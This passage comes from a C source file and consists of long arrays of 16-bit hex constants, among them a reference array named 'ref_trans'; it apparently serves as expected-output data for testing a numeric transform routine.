0xb6f5, 0xac52, 0x2774, 0xae75, 0x355e, 0x31fd, 0xb2fb, 0xacfd, 0x227c, 0x2453, 0xaafb, 0xa693, 0xb210, 0xaf7f, 0xb0d6, 0x2c1a, 0x9def, 0x33ed, 0x2d8c, 0xaa09, 0x2c15, 0xb408, 0x2179, 0xb076, 0x3202, 0xb2e3, 0xad11, 0x2446, 0xac75, 0x9c77, 0x347a, 0x2f4d, 0x256d, 0x2eb1, 0x30c7, 0x300d, 0x2e0d, 0x3055, 0xaaeb, 0xa404, 0xac5c, 0xad9b, 0xa01f, 0x2cb5, 0x2c4f, 0x2cfd, 0xa9b8, 0x30ad, 0xa47d, 0xaf95, 0x2e40, 0xb30b, 0x2e25, 0xb091, 0xae9d, 0x30a4, 0x9e62, 0x2e6e, 0x2e4d, 0xa4fc, 0x3239, 0x2d5b, 0xa73a, 0x323d, 0xb077, 0xab9d, 0xa847, 0xb444, 0xb2eb, 0xb1ae, 0xacf9, 0xb327, 0x2dba, 0x33ac, 0xb017, 0x2e7d, 0xa886, 0xb0f6, 0x1ed7, 0xad3f, 0x2c16, 0x2902, 0x302d, 0xb35c, 0xb13f, 0x2ec8, 0xac6d, 0x1a5a, 0x34d7, 0xb3b9, 0x2990, 0x3092, 0xb2e7, 0x2b72, 0xa88b, 0xaba9, 0xadeb, 0x8b5e, 0x9fb0, 0x9f44, 0xa630, 0xafa7, 0x33e3, 0x2fb2, 0xafe1, 0xb4af, 0xb0d1, 0x3135, 0xb1c2, 0xa5c9, 0xb0b3, 0x205a, 0xa900, 0xb3ea, 0xa9d0, 0xaa6b, 0xb15e, 0xa95a, 0x3611, 0xabf5, 0x2dbb, 0xafaa, 0x20f2, 0x33c1, 0xa5ec, 0x2ed7, 0x2fa8, 0xa68b, 0xabf2, 0xb017, 0xa8dd, 0xb140, 0xaa84, 0xac22, 0xab0b, 0xafdc, 0xafbd, 0x2ffa, 0xa1e6, 0xaf9e, 0xac68, 0xb02f, 0x24eb, 0xab8b, 0xa82a, 0xb4ac, 0x3148, 0xb363, 0x31a9, 0x2cb1, 0x2d71, 0xb4aa, 0xa84c, 0x2c95, 0x28da, 0x23ed, 0xab3c, 0xb1d5, 0x3017, 0x343b, 0x2cc2, 0x293b, 0x1ea2, 0x2bb4, 0x20cf, 0xb0bc, 0xa6a9, 0x2cbb, 0xb2b7, 0x290e, 0xaa8c, 0xb1ef, 0x31dd, 0x3080, 0x17ad, 0x3411, 0x3747, 0x300d, 0xad37, 0x344c, 0x34cf, 0xb44c, 0x2b0b, 0x2773, 0xaa02, 0x2bad, 0x2a46, 0x2f4a, 0xa35b, 0x2f41, 0x27dd, 0x2237, 0xb34d, 0x2403, 0x2d55, 0xab0b, 0x9593, 0x22bf, 0xb26c, 0xb070, 0x3158, 0x1eef, 0x2fe7, 0x257f, 0x2808, 0xb211, 0x15ef, 0xb045, 0xb271, 0x27c3, 0xb19a, 0xafe5, 0x217e, 0x2834, 0x2a34, 0xb068, 0x2aca, 0x311f, 0xb062, 0xa687, 0x2c3d, 0x31af, 0x9d90, 0x2fce, 0x34ad, 0x24cd, 0x20fc, 0x30ed, 0xb0bf, 0x2a26, 0xabcc, 0xb08a, 0x30d2, 0x297c, 0xadbd, 0xb005, 0x2d01, 0x9af1, 0x300b, 0xa6bc, 0xaf94, 0xaf6b, 0xac83, 0xb0a7, 0x2391, 0x3278, 0x35a7, 0x3076, 0x2d2f, 0x28a9, 0x31e5, 0xa813, 0xb073, 0x3066, 0x2f29, 0xae24, 0xb4d7, 0xae20, 0xa7c5, 0x3196, 0x2d4e, 0x2d73, 0xa83e, 0xb41d, 0xada0, 0x2ec9, 0xb09d, 0xa821, 0xa6d1, 0x324b, 0x2c6e, 0x269c, 0xaaae, 0xaf3c, 0xaeae, 0x3030, 0x351d, 0xb1ff, 0xb0e2, 0xaa83, 0xb365, 0x33c9, 0x2a83, 0xa151, 0x2731, 0xb534, 0x2c1c, 0xa94f, 0x2a09, 0xb30b, 0x3381, 0x3413, 0xa74e, 0x2a0a, 0xacbd, 0xa974, 0x2f6b, 0xa72a, 0xb059, 0x33b4, 0x9a14, 0x2550, 0xada5, 0x8ca7, 0x2d58, 0x3033, 0x2cea, 0xa4b8, 0x2953, 0x306c, 0x2cbc, 0xb016, 0x2029, 0xb298, 0x2d57, 0x3078, 0xa9a3, 0xad0b, 0x1e9d, 0x3164, 0xb06f, 0xb043, 0x2a65, 0x260a, 0x310d, 0x2ea8, 0x1c33, 0xac20, 0x31b4, 0x2015, 0x2876, 0x1bc8, 0xaca5, 0xa8a3, 0xac43, 0x2c1e, 0x3431, 0x2bfc, 0xb3d2, 0xb01e, 0xb436, 0xa313, 0x3105, 0x2e39, 0x2ca9, 0xb21d, 0xb16d, 0xb3f3, 0x291d, 0x3190, 0x2b3e, 0x16d2, 0xad13, 0x3288, 0xa8fd, 0xae5b, 0xad24, 0x3112, 0x2490, 0xa9d0, 0x2e8c, 0xad6c, 0xacf6, 0xb06a, 0xaa1e, 0x34b2, 0xab43, 0x2d42, 0xb6f5, 0xac52, 0x2774, 0xae75, 0x355e, 0x31fd, 0xb2fb, 0xacfd, 0x227c, 0x2453, 0xaafb, 0xa693, 0xb210, 0xaf7f, 0xb0d6, 0x2c1a, 0x9def, 0x33ed, 0x2d8c, 0xaa09, 0x2c15, 0xb408, 0x2179, 0xb076, 0x3202, 0xb2e3, 0xad11, 0x2446, 0xac75, 0x9c77, 0x347a, 0x2f4d, 0x256d, 0x2eb1, 0x30c7, 0x300d, 0x2e0d, 0x3055, 0xaaeb, 0xa404, 0xac5c, 0xad9b, 0xa01f, 0x2cb5, 0x2c4f, 0x2cfd, 0xa9b8, 0x30ad, 0xa47d, 0xaf95, 0x2e40, 0xb30b, 0x2e25, 0xb091, 0xae9d, 0x30a4, 0x9e62, 0x2e6e, 0x2e4d, 0xa4fc, 0x3239, 0x2d5b, 0xa73a, 0x323d, 0xb077, 0xab9d, 0xa847, 0xb444, 0xb2eb, 0xb1ae, 0xacf9, 0xb327, 0x2dba, 0x33ac, 0xb017, 0x2e7d, 0xa886, 0xb0f6, 0x1ed7, 0xad3f, 0x2c16, 0x2902, 0x302d, 0xb35c, 0xb13f, 0x2ec8, 0xac6d, 0x1a5a, 0x34d7, 0xb3b9, 0x2990, 0x3092, 0xb2e7, 0x2b72, 0xa88b, 0xaba9, 0xadeb, 0x8b5e, 0x9fb0, 0x9f44, 0xa630, 0xafa7, 0x33e3, 0x2fb2, 0xafe1, 0xb4af, 0xb0d1, 0x3135, 0xb1c2, 0xa5c9, 0xb0b3, 0x205a, 0xa900, 0xb3ea, 0xa9d0, 0xaa6b, 0xb15e, 0xa95a, 0x3611, 0xabf5, 0x2dbb, 0xafaa, 0x20f2, 0x33c1, 0xa5ec, 0x2ed7, 0x2fa8, 0xa68b, 0xabf2, 0xb017, 0xa8dd, 0xb140, 0xaa84, 0xac22, 0xab0b, 0xafdc, 0xafbd, 0x2ffa, 0xa1e6, 0xaf9e, 0xac68, 0xb02f, 0x24eb, 0xab8b, 0xa82a, 0xb4ac, 0x3148, 0xb363, 0x31a9, 0x2cb1, 0x2d71, 0xb4aa, 0xa84c, 0x2c95, 0x28da, 0x23ed, 0xab3c, 0xb1d5, 0x3017, 0x343b, 0x2cc2, 0x293b, 0x1ea2, 0x2bb4, 0x20cf, 0xb0bc, 0xa6a9, 0x2cbb, 0xb2b7, 0x290e, 0xaa8c, 0xb1ef, 0x31dd, 0x3080, 0x17ad, 0x3411, 0x3747, 0x300d, 0xad37, 0x344c, 0x34cf, 0xb44c, 0x2b0b, 0x2773, 0xaa02, 0x2bad, 0x2a46, 0x2f4a, 0xa35b, 0x2f41, 0x27dd, 0x2237, 0xb34d, 0x2403, 0x2d55, 0xab0b, 0x9593, 0x22bf, 0xb26c, 0xb070, 0x3158, 0x1eef, 0x2fe7, 0x257f, 0x2808, 0xb211, 0x15ef, 0xb045, 0xb271, 0x27c3, 0xb19a, 0xafe5, 0x217e, 0x2834, 0x2a34, 0xb068, 0x2aca, 0x311f, 0xb062, 0xa687, 0x2c3d, 0x31af, 0x9d90, 0x2fce, 0x34ad, 0x24cd, 0x20fc, 0x30ed, 0xb0bf, 0x2a26, 0xabcc, 0xb08a, 0x30d2, 0x297c, 0xadbd, 0xb005, 0x2d01, 0x9af1, 0x300b, 0xa6bc, 0xaf94, 0xaf6b, 0xac83, 0xb0a7, 0x2391, 0x3278, 0x35a7, 0x3076, 0x2d2f, 0x28a9, 0x31e5, 0xa813, 0xb073, 0x3066, 0x2f29, 0xae24, 0xb4d7, 0xae20, 0xa7c5, 0x3196, 0x2d4e, 0x2d73, 0xa83e, 0xb41d, 0xada0, 0x2ec9, 0xb09d, 0xa821, 0xa6d1, 0x324b, 0x2c6e, 0x269c, 0xaaae, 0xaf3c, 0xaeae, 0x3030, 0x351d, 0xb1ff, 0xb0e2, 0xaa83, 0xb365, 0x33c9, 0x2a83, 0xa151, 0x2731, 0xb534, 0x2c1c, 0xa94f, 0x2a09, 0xb30b, 0x3381, 0x3413, 0xa74e, 0x2a0a, 0xacbd, 0xa974, 0x2f6b, 0xa72a, 0xb059, 0x33b4, 0x9a14, 0x2550, 0xada5, 0x8ca7, 0x2d58, 0x3033, 0x2cea, 0xa4b8, 0x2953, 0x306c, 0x2cbc, 0xb016, 0x2029, 0xb298, 0x2d57, 0x3078, 0xa9a3, 0xad0b, 0x1e9d, 0x3164, 0xb06f, 0xb043, 0x2a65, 0x260a, 0x310d, 0x2ea8, 0x1c33, 0xac20, 0x31b4, 0x2015, 0x2876, 0xa3c8, 0xb030, 0x25e0, 0x2cbe, 0x2ca4, 0x2c33, 0xb141, 0xa0ed, 0x236a, 0x2f22, 0xb25d, 0xada0, 0xb442, 0x311a, 0xaca3, 0xb03e, 0x1fdf, 0x2e09, 0xab98, 0x2d81, 0xac17, 0xb0c7, 0xb39e, 0xafaf, 0x29ac, 0x14c1, 0xb181, 0xb12a, 0xaf98, 0x1a84, 0x28ff, 0x3357, 0x3175, 0xb041, 0x3104, 0x2d28, 0xa863, 0x309a, 0xac05, 0xb01c, 0x3419, 0x3313, 0x285a, 0xa4e7, 0xb215, 0x340c, 0x2f59, 0x2d48, 0xbbd, 0x258e, 0xa53e, 0x3044, 0xa48c, 0x304a, 0xafc3, 0x29c6, 0x2b68, 0xac5d, 0xad1c, 0x2d8e, 0x2641, 0x3047, 0x2cba, 0x9379, 0xab0c, 0x2d10, 0x308a, 0xad72, 0x2e90, 0x9948, 0xaa16, 0x259b, 0xaac2, 0xa3a3, 0x31ba, 0x30bf, 0xad45, 0xa953, 0xaffa, 0xb02f, 0xac3b, 0x1f74, 0xae90, 0x3139, 0x326f, 0xaf59, 0x32d7, 0x29a9, 0xa23e, 0x3103, 0x307a, 0xb09f, 0xae9d, 0x2766, 0x29a1, 0xb40b, 0xa907, 0xa6ea, 0x3467, 0xad41, 0xad7c, 0xb2e5, 0xb256, 0x3501, 0x2c13, 0x2985, 0xac01, 0xaca0, 0xa91d, 0x2941, 0x321d, 0x1d9d, 0x9fb5, 0xaa42, 0xa456, 0xb150, 0xb044, 0xb1d6, 0x2c31, 0x20b1, 0x2d33, 0xaca0, 0x2b80, 0x313e, 0x25a0, 0x9555, 0x2d24, 0xb0f8, 0xb2c3, 0x3000, 0xb0e5, 0xb257, 0xa8d6, 0x1b42, 0x2555, 0x2f10, 0xa533, 0x318d, 0xb359, 0x31fc, 0x300b, 0xae06, 0xb525, 0xb2e3, 0xac03, 0xb3f5, 0xa943, 0x2fe4, 0xa78a, 0x3446, 0x36ac, 0x22af, 0x2385, 0x3639, 0xaeea, 0xb5b4, 0xb2a8, 0x270f, 0xb15c, 0x327b, 0x341c }; static const uint16_t ref_trans[3136] = { 0x1fc8, 0x1fc8, 0xb0a5, 0x1fc8, 0xb0a5, 0xaca3, 0x1fc8, 0xb0a5, 0xaca3, 0xb043, 0x1fc8, 0xb0a5, 0xaca3, 0xb043, 0x301e, 0x3831, 0x2ffc, 0x1fc8, 0xb0a5, 0xaca3, 0xb043, 0x301e, 0x3831, 0x2ffc, 0xb7d2, 0xb41e, 0xb836, 0xa713, 0x3505, 0x3239, 0x30a9, 0xb61d, 0xb56d, 0x1fc8, 0xb0a5, 0xaca3, 0xb043, 0x301e, 0x3831, 0x2ffc, 0xb7d2, 0xb41e, 0xb836, 0xa713, 0x3505, 0x3239, 0x30a9, 0xb61d, 0xb56d, 0xb7f3, 0x2d1d, 0x3590, 0x2f3e, 0x1ad2, 0xb113, 0x3688, 0x1fc8, 0xb0a5, 0x1fc8, 0xaca3, 0xb0a5, 0xb043, 0x1fc8, 0xb043, 0xb0a5, 0x301e, 0xaca3, 0x3831, 0x1fc8, 0x301e, 0xb0a5, 0x3831, 0xaca3, 0x2ffc, 0xb043, 0xb7d2, 0x1fc8, 0xb7d2, 0xb0a5, 0xb41e, 0xaca3, 0xb836, 0xb043, 0xa713, 0x301e, 0x3505, 0x3831, 0x3239, 0x2ffc, 0x30a9, 0x1fc8, 0xb7f3, 0xb0a5, 0x2d1d, 0xaca3, 0x3590, 0xb043, 0x2f3e, 0x301e, 0x1ad2, 0x3831, 0xb113, 0x2ffc, 0x3688, 0xb7d2, 0xacfd, 0xb41e, 0xb25b, 0xb836, 0xb124, 0xa713, 0x3512, 0x3505, 0x2890, 0x3239, 0xadd0, 0x30a9, 0x328c, 0xb61d, 0xb16c, 0xb56d, 0xb0f6, 0x1fc8, 0xacfd, 0xb0a5, 0xb25b, 0xaca3, 0xb124, 0xb043, 0x3512, 0x301e, 0x2890, 0x3831, 0xadd0, 0x2ffc, 0x328c, 0xb7d2, 0xb16c, 0xb41e, 0xb0f6, 0xb836, 0xb46a, 0xa713, 0xae1e, 0x3505, 0x38b2, 0x3239, 0xaf43, 0x30a9, 0x3142, 0xb61d, 0xbaf5, 0xb56d, 0xb052, 0xb7f3, 0x2b74, 0x2d1d, 0xb275, 0x3590, 0x395e, 0x2f3e, 0x35fd, 0x1ad2, 0xb6fb, 0xb113, 0xb0fd, 0x3688, 0x267c, 0x1fc8, 0xb0a5, 0xaca3, 0x1fc8, 0xaca3, 0x301e, 0xb0a5, 0xb043, 0x3831, 0x1fc8, 0xb043, 0x2ffc, 0xb0a5, 0x301e, 0xb7d2, 0xaca3, 0x3831, 0xb41e, 0x1fc8, 0x301e, 0xb41e, 0xb0a5, 0x3831, 0xb836, 0xaca3, 0x2ffc, 0xa713, 0xb043, 0xb7d2, 0x3505, 0x1fc8, 0xb7d2, 0xb61d, 0xb0a5, 0xb41e, 0xb56d, 0xaca3, 0xb836, 0xb7f3, 0xb043, 0xa713, 0x2d1d, 0x301e, 0x3505, 0x3590, 0x3831, 0x3239, 0x2f3e, 0x2ffc, 0x30a9, 0x1ad2, 0x1fc8, 0xb7f3, 0xb46a, 0xb0a5, 0x2d1d, 0xae1e, 0xaca3, 0x3590, 0x38b2, 0xb043, 0x2f3e, 0xaf43, 0x301e, 0x1ad2, 0x3142, 0x3831, 0xb113, 0xbaf5, 0x2ffc, 0x3688, 0xb052, 0xb7d2, 0xacfd, 0x2b74, 0xb41e, 0xb25b, 0xb275, 0xb836, 0xb124, 0x395e, 0xa713, 0x3512, 0x35fd, 0x3505, 0x2890, 0xb6fb, 0x3239, 0xadd0, 0xb0fd, 0x30a9, 0x328c, 0x267c, 0xb61d, 0xb16c, 0x2853, 0xb56d, 0xb0f6, 0xaefb, 0x1fc8, 0xacfd, 0x2853, 0xb0a5, 0xb25b, 0xaefb, 0xaca3, 0xb124, 0xaa93, 0xb043, 0x3512, 0xb610, 0x301e, 0x2890, 0xb37f, 0x3831, 0xadd0, 0xb4d6, 0x2ffc, 0x328c, 0x301a, 0xb7d2, 0xb16c, 0xa1ef, 0xb41e, 0xb0f6, 0x37ed, 0xb836, 0xb46a, 0x318c, 0xa713, 0xae1e, 0xae09, 0x3505, 0x38b2, 0x3015, 0x3239, 0xaf43, 0xb808, 0x30a9, 0x3142, 0x2579, 0xb61d, 0xbaf5, 0xb476, 0xb56d, 0xb052, 0x3602, 0xb7f3, 0x2b74, 0xb6e3, 0x2d1d, 0xb275, 0xb111, 0x3590, 0x395e, 0x2846, 0x2f3e, 0x35fd, 0xb075, 0x1ad2, 0xb6fb, 0xa077, 0xb113, 0xb0fd, 0x387a, 0x3688, 0x267c, 0x334d, 0x1fc8, 0xb0a5, 0xaca3, 0xb043, 0x1fc8, 0xaca3, 0x301e, 0x2ffc, 0xb0a5, 0xb043, 0x3831, 0xb7d2, 0x1fc8, 0xb043, 0x2ffc, 0xb836, 0xb0a5, 0x301e, 0xb7d2, 0xa713, 0xaca3, 0x3831, 0xb41e, 0x3505, 0x1fc8, 0x301e, 0xb41e, 0x3239, 0xb0a5, 0x3831, 0xb836, 0x30a9, 0xaca3, 0x2ffc, 0xa713, 0xb61d, 0xb043, 0xb7d2, 0x3505, 0xb56d, 0x1fc8, 0xb7d2, 0xb61d, 0xb113, 0xb0a5, 0xb41e, 0xb56d, 0x3688, 0xaca3, 0xb836, 0xb7f3, 0xacfd, 0xb043, 0xa713, 0x2d1d, 0xb25b, 0x301e, 0x3505, 0x3590, 0xb124, 0x3831, 0x3239, 0x2f3e, 0x3512, 0x2ffc, 0x30a9, 0x1ad2, 0x2890, 0x1fc8, 0xb7f3, 0xb46a, 0xaa93, 0xb0a5, 0x2d1d, 0xae1e, 0xb610, 0xaca3, 0x3590, 0x38b2, 0xb37f, 0xb043, 0x2f3e, 0xaf43, 0xb4d6, 0x301e, 0x1ad2, 0x3142, 0x301a, 0x3831, 0xb113, 0xbaf5, 0xa1ef, 0x2ffc, 0x3688, 0xb052, 0x37ed, 0xb7d2, 0xacfd, 0x2b74, 0x318c, 0xb41e, 0xb25b, 0xb275, 0xae09, 0xb836, 0xb124, 0x395e, 0x3015, 0xa713, 0x3512, 0x35fd, 0xb808, 0x3505, 0x2890, 0xb6fb, 0x2579, 0x3239, 0xadd0, 0xb0fd, 0xb476, 0x30a9, 0x328c, 0x267c, 0x3602, 0xb61d, 0xb16c, 0x2853, 0xb6e3, 0xb56d, 0xb0f6, 0xaefb, 0xb111, 0x1fc8, 0xacfd, 0x2853, 0x296d, 0xb0a5, 0xb25b, 0xaefb, 0x32b1, 0xaca3, 0xb124, 0xaa93, 0x34c7, 0xb043, 0x3512, 0xb610, 0x340d, 0x301e, 0x2890, 0xb37f, 0x320d, 0x3831, 0xadd0, 0xb4d6, 0x3455, 0x2ffc, 0x328c, 0x301a, 0xaeeb, 0xb7d2, 0xb16c, 0xa1ef, 0xa804, 0xb41e, 0xb0f6, 0x37ed, 0xb05c, 0xb836, 0xb46a, 0x318c, 0xb19b, 0xa713, 0xae1e, 0xae09, 0xa41f, 0x3505, 0x38b2, 0x3015, 0x30b5, 0x3239, 0xaf43, 0xb808, 0x304f, 0x30a9, 0x3142, 0x2579, 0x30fd, 0xb61d, 0xbaf5, 0xb476, 0xadb8, 0xb56d, 0xb052, 0x3602, 0x34ad, 0xb7f3, 0x2b74, 0xb6e3, 0xa87d, 0x2d1d, 0xb275, 0xb111, 0xb395, 0x3590, 0x395e, 0x2846, 0x3240, 0x2f3e, 0x35fd, 0xb075, 0xb70b, 0x1ad2, 0xb6fb, 0xa077, 0x3225, 0xb113, 0xb0fd, 0x387a, 0xb491, 0x3688, 0x267c, 0x334d, 0xb29d, 0x1fc8, 0xb0a5, 0xaca3, 0xb043, 0x301e, 0x3831, 0x2ffc, 0x1fc8, 0xaca3, 0x301e, 0x2ffc, 0xb41e, 0xa713, 0x3239, 0xb0a5, 0xb043, 0x3831, 0xb7d2, 0xb836, 0x3505, 0x30a9, 0x1fc8, 0xb043, 0x2ffc, 0xb836, 0x3239, 0xb56d, 0x3590, 0xb0a5, 0x301e, 0xb7d2, 0xa713, 0x30a9, 0xb7f3, 0x2f3e, 0xaca3, 0x3831, 0xb41e, 0x3505, 0xb61d, 0x2d1d, 0x1ad2, 0x1fc8, 0x301e, 0xb41e, 0x3239, 0xb7f3, 0x1ad2, 0xb25b, 0xb0a5, 0x3831, 0xb836, 0x30a9, 0x2d1d, 0xb113, 0xb124, 0xaca3, 0x2ffc, 0xa713, 0xb61d, 0x3590, 0x3688, 0x3512, 0xb043, 0xb7d2, 0x3505, 0xb56d, 0x2f3e, 0xacfd, 0x2890, 0x1fc8, 0xb7d2, 0xb61d, 0xb113, 0xadd0, 0xaf43, 0x35fd, 0xb0a5, 0xb41e, 0xb56d, 0x3688, 0x328c, 0x3142, 0xb6fb, 0xaca3, 0xb836, 0xb7f3, 0xacfd, 0xb16c, 0xbaf5, 0xb0fd, 0xb043, 0xa713, 0x2d1d, 0xb25b, 0xb0f6, 0xb052, 0x267c, 0x301e, 0x3505, 0x3590, 0xb124, 0xb46a, 0x2b74, 0x2853, 0x3831, 0x3239, 0x2f3e, 0x3512, 0xae1e, 0xb275, 0xaefb, 0x2ffc, 0x30a9, 0x1ad2, 0x2890, 0x38b2, 0x395e, 0xaa93, 0x1fc8, 0xb7f3, 0xb46a, 0xaa93, 0x2846, 0x30b5, 0xa8fc, 0xb0a5, 0x2d1d, 0xae1e, 0xb610, 0xb075, 0x304f, 0x3639, 0xaca3, 0x3590, 0x38b2, 0xb37f, 0xa077, 0x30fd, 0x315b, 0xb043, 0x2f3e, 0xaf43, 0xb4d6, 0x387a, 0xadb8, 0xab3a, 0x301e, 0x1ad2, 0x3142, 0x301a, 0x334d, 0x34ad, 0x363d, 0x3831, 0xb113, 0xbaf5, 0xa1ef, 0x296d, 0xa87d, 0xb477, 0x2ffc, 0x3688, 0xb052, 0x37ed, 0x32b1, 0xb395, 0xaf9d, 0xb7d2, 0xacfd, 0x2b74, 0x318c, 0x34c7, 0x3240, 0xac47, 0xb41e, 0xb25b, 0xb275, 0xae09, 0x340d, 0xb70b, 0xb844, 0xb836, 0xb124, 0x395e, 0x3015, 0x320d, 0x3225, 0xb6eb, 0xa713, 0x3512, 0x35fd, 0xb808, 0x3455, 0xb491, 0xb5ae, 0x3505, 0x2890, 0xb6fb, 0x2579, 0xaeeb, 0xb29d, 0xb0f9, 0x3239, 0xadd0, 0xb0fd, 0xb476, 0xa804, 0x34a4, 0xb727, 0x30a9, 0x328c, 0x267c, 0x3602, 0xb05c, 0xa262, 0x31ba, 0xb61d, 0xb16c, 0x2853, 0xb6e3, 0xb19b, 0x326e, 0x37ac, 0xb56d, 0xb0f6, 0xaefb, 0xb111, 0xa41f, 0x324d, 0xb417, 0x1fc8, 0xacfd, 0x2853, 0x296d, 0x34a4, 0x22d7, 0xb3a7, 0xb0a5, 0xb25b, 0xaefb, 0x32b1, 0xa262, 0xb13f, 0x37e3, 0xaca3, 0xb124, 0xaa93, 0x34c7, 0x326e, 0x3016, 0x33b2, 0xb043, 0x3512, 0xb610, 0x340d, 0x324d, 0x2d02, 0xb3e1, 0x301e, 0x2890, 0xb37f, 0x320d, 0xa8fc, 0x342d, 0xb8af, 0x3831, 0xadd0, 0xb4d6, 0x3455, 0x3639, 0xb75c, 0xb4d1, 0x2ffc, 0x328c, 0x301a, 0xaeeb, 0x315b, 0xb53f, 0x3535, 0xb7d2, 0xb16c, 0xa1ef, 0xa804, 0xab3a, 0x32c8, 0xb5c2, 0xb41e, 0xb0f6, 0x37ed, 0xb05c, 0x363d, 0xb06d, 0xa9c9, 0xb836, 0xb46a, 0x318c, 0xb19b, 0xb477, 0x1e5a, 0xb4b3, 0xa713, 0xae1e, 0xae09, 0xa41f, 0xaf9d, 0x38d7, 0x245a, 0x3505, 0x38b2, 0x3015, 0x30b5, 0xac47, 0xb7b9, 0xad00, 0x3239, 0xaf43, 0xb808, 0x304f, 0xb844, 0x2d90, 0xb7ea, 0x30a9, 0x3142, 0x2579, 0x30fd, 0xb6eb, 0x3492, 0xadd0, 0xb61d, 0xbaf5, 0xb476, 0xadb8, 0xb5ae, 0xb6e7, 0xae6b, 0xb56d, 0xb052, 0x3602, 0x34ad, 0xb0f9, 0x2f72, 0xb55e, 0xb7f3, 0x2b74, 0xb6e3, 0xa87d, 0xb727, 0xac8b, 0xad5a, 0x2d1d, 0xb275, 0xb111, 0xb395, 0x31ba, 0xafa9, 0x3a11, 0x3590, 0x395e, 0x2846, 0x3240, 0x37ac, 0xb1eb, 0xaff5, 0x2f3e, 0x35fd, 0xb075, 0xb70b, 0xb417, 0x8f5e, 0x31bb, 0x1ad2, 0xb6fb, 0xa077, 0x3225, 0x327d, 0xa3b0, 0xb3aa, 0xb113, 0xb0fd, 0x387a, 0xb491, 0xac86, 0xa344, 0x24f2, 0x3688, 0x267c, 0x334d, 0xb29d, 0xb4f6, 0xaa30, 0x37c1, 0x1fc8, 0xb0a5, 0xaca3, 0xb043, 0x301e, 0x3831, 0x2ffc, 0xb7d2, 0xb41e, 0xb836, 0xa713, 0x3505, 0x3239, 0x30a9, 0xb61d, 0xb56d, 0x1fc8, 0xaca3, 0x301e, 0x2ffc, 0xb41e, 0xa713, 0x3239, 0xb61d, 0xb7f3, 0x3590, 0x1ad2, 0x3688, 0xb25b, 0x3512, 0xadd0, 0xb16c, 0xb0a5, 0xb043, 0x3831, 0xb7d2, 0xb836, 0x3505, 0x30a9, 0xb56d, 0x2d1d, 0x2f3e, 0xb113, 0xacfd, 0xb124, 0x2890, 0x328c, 0xb0f6, 0x1fc8, 0xb043, 0x2ffc, 0xb836, 0x3239, 0xb56d, 0x3590, 0xb113, 0xb25b, 0x2890, 0xb16c, 0xae1e, 0x3142, 0x2b74, 0x35fd, 0x267c, 0xb0a5, 0x301e, 0xb7d2, 0xa713, 0x30a9, 0xb7f3, 0x2f3e, 0x3688, 0xb124, 0xadd0, 0xb0f6, 0x38b2, 0xbaf5, 0xb275, 0xb6fb, 0x2853, 0xaca3, 0x3831, 0xb41e, 0x3505, 0xb61d, 0x2d1d, 0x1ad2, 0xacfd, 0x3512, 0x328c, 0xb46a, 0xaf43, 0xb052, 0x395e, 0xb0fd, 0xaefb, 0x1fc8, 0x301e, 0xb41e, 0x3239, 0xb7f3, 0x1ad2, 0xb25b, 0xadd0, 0xb46a, 0x3142, 0xb275, 0xb0fd, 0xaa93, 0x301a, 0xae09, 0xb476, 0xb0a5, 0x3831, 0xb836, 0x30a9, 0x2d1d, 0xb113, 0xb124, 0x328c, 0xae1e, 0xbaf5, 0x395e, 0x267c, 0xb610, 0xa1ef, 0x3015, 0x3602, 0xaca3, 0x2ffc, 0xa713, 0xb61d, 0x3590, 0x3688, 0x3512, 0xb16c, 0x38b2, 0xb052, 0x35fd, 0x2853, 0xb37f, 0x37ed, 0xb808, 0xb6e3, 0xb043, 0xb7d2, 0x3505, 0xb56d, 0x2f3e, 0xacfd, 0x2890, 0xb0f6, 0xaf43, 0x2b74, 0xb6fb, 0xaefb, 0xb4d6, 0x318c, 0x2579, 0xb111, 0x1fc8, 0xb7d2, 0xb61d, 0xb113, 0xadd0, 0xaf43, 0x35fd, 0xb610, 0xae09, 0xb111, 0x32b1, 0xb05c, 0x34ad, 0xb29d, 0x315b, 0xb6eb, 0xb0a5, 0xb41e, 0xb56d, 0x3688, 0x328c, 0x3142, 0xb6fb, 0xb37f, 0x3015, 0x2846, 0x34c7, 0xb19b, 0xa87d, 0x34a4, 0xab3a, 0xb5ae, 0xaca3, 0xb836, 0xb7f3, 0xacfd, 0xb16c, 0xbaf5, 0xb0fd, 0xb4d6, 0xb808, 0xb075, 0x340d, 0xa41f, 0xb395, 0xa262, 0x363d, 0xb0f9, 0xb043, 0xa713, 0x2d1d, 0xb25b, 0xb0f6, 0xb052, 0x267c, 0x301a, 0x2579, 0xa077, 0x320d, 0x30b5, 0x3240, 0x326e, 0xb477, 0xb727, 0x301e, 0x3505, 0x3590, 0xb124, 0xb46a, 0x2b74, 0x2853, 0xa1ef, 0xb476, 0x387a, 0x3455, 0x304f, 0xb70b, 0x324d, 0xaf9d, 0x31ba, 0x3831, 0x3239, 0x2f3e, 0x3512, 0xae1e, 0xb275, 0xaefb, 0x37ed, 0x3602, 0x334d, 0xaeeb, 0x30fd, 0x3225, 0xa8fc, 0xac47, 0x37ac, 0x2ffc, 0x30a9, 0x1ad2, 0x2890, 0x38b2, 0x395e, 0xaa93, 0x318c, 0xb6e3, 0x296d, 0xa804, 0xadb8, 0xb491, 0x3639, 0xb844, 0xb417, 0x1fc8, 0xb7f3, 0xb46a, 0xaa93, 0x2846, 0x30b5, 0xa8fc, 0x327d, 0x3492, 0x3535, 0x37c1, 0xb39e, 0x27ed, 0xb5ef, 0x334a, 0x297f, 0xb0a5, 0x2d1d, 0xae1e, 0xb610, 0xb075, 0x304f, 0x3639, 0xac86, 0xb6e7, 0xb5c2, 0xa9ec, 0xb068, 0xaf3c, 0x35dd, 0xa75b, 0x2c08, 0xaca3, 0x3590, 0x38b2, 0xb37f, 0xa077, 0x30fd, 0x315b, 0xb4f6, 0x2f72, 0xa9c9, 0x32d7, 0xb42f, 0xb5d5, 0x3480, 0x3341, 0xb611, 0xb043, 0x2f3e, 0xaf43, 0xb4d6, 0x387a, 0xadb8, 0xab3a, 0x22d7, 0xac8b, 0xb4b3, 0x33a8, 0x28eb, 0x3417, 0x1bad, 0x2bdd, 0x19ef, 0x301e, 0x1ad2, 0x3142, 0x301a, 0x334d, 0x34ad, 0x363d, 0xb13f, 0xafa9, 0x245a, 0xaa8b, 0xaf8b, 0x383b, 0x3811, 0x2637, 0xb445, 0x3831, 0xb113, 0xbaf5, 0xa1ef, 0x296d, 0xa87d, 0xb477, 0x3016, 0xb1eb, 0xad00, 0xaff2, 0xac2a, 0x30c2, 0x3b47, 0xb74d, 0xb671, 0x2ffc, 0x3688, 0xb052, 0x37ed, 0x32b1, 0xb395, 0xaf9d, 0x2d02, 0x8f5e, 0xb7ea, 0xb417, 